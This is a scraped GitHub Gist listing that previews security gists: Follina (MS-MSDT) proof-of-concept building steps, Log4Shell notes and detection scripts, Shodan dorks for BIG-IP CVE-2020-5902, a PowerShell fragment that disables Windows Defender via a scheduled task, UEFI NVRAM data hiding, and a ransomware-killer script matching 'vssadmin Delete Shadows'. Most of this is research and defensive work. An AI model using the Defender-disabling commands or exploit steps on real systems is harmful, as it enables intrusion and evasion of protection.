Skip to content

Instantly share code, notes, and snippets.


Vesselin Bontchev bontchev

View GitHub Profile
tothi / ms-msdt.MD
Last active Sep 12, 2022
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
nathanqthai /
Last active Sep 3, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence


Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.


The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

gnremy / CVE-2021-44228_IPs.csv
Last active Mar 23, 2022
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
View CVE-2021-44228_IPs.csv
ip tag_name Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt Apache Log4j RCE Attempt
byt3bl33d3r /
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (
#! /usr/bin/env python3
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
geek-at /
Created Aug 13, 2020
The script used to trash a banking phishing site
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
gitdagray / online_offline_detection.js
Last active Sep 26, 2022
Online / Offline Status Detection w/ Async & Await
View online_offline_detection.js
/* ********** Online / Offline Detection ********** */
// Request a small image at an interval to determine status
// ** Get a 1x1 pixel image here:
// ** Use this code with an HTML element with id="status"
const checkOnlineStatus = async () => {
try {
const online = await fetch("/1pixel.png");
return online.status >= 200 && online.status < 300; // either true or false
cihanmehmet /
Last active Sep 29, 2022
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Seaarch

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"


tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
jthuraisamy /
Last active Oct 19, 2022
GospelRoom: Data Storage in UEFI NVRAM Variables

GospelRoom: Data Storage in UEFI NVRAM Variables


Persist data in UEFI NVRAM variables.


  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
View Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
# Kill all parent processes from detected vssadmin process
$p = $EventArgs.NewEvent.TargetInstance
while ($p) {
$ppid = $p.ParentProcessID
$pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
Write-Host $p.ProcessID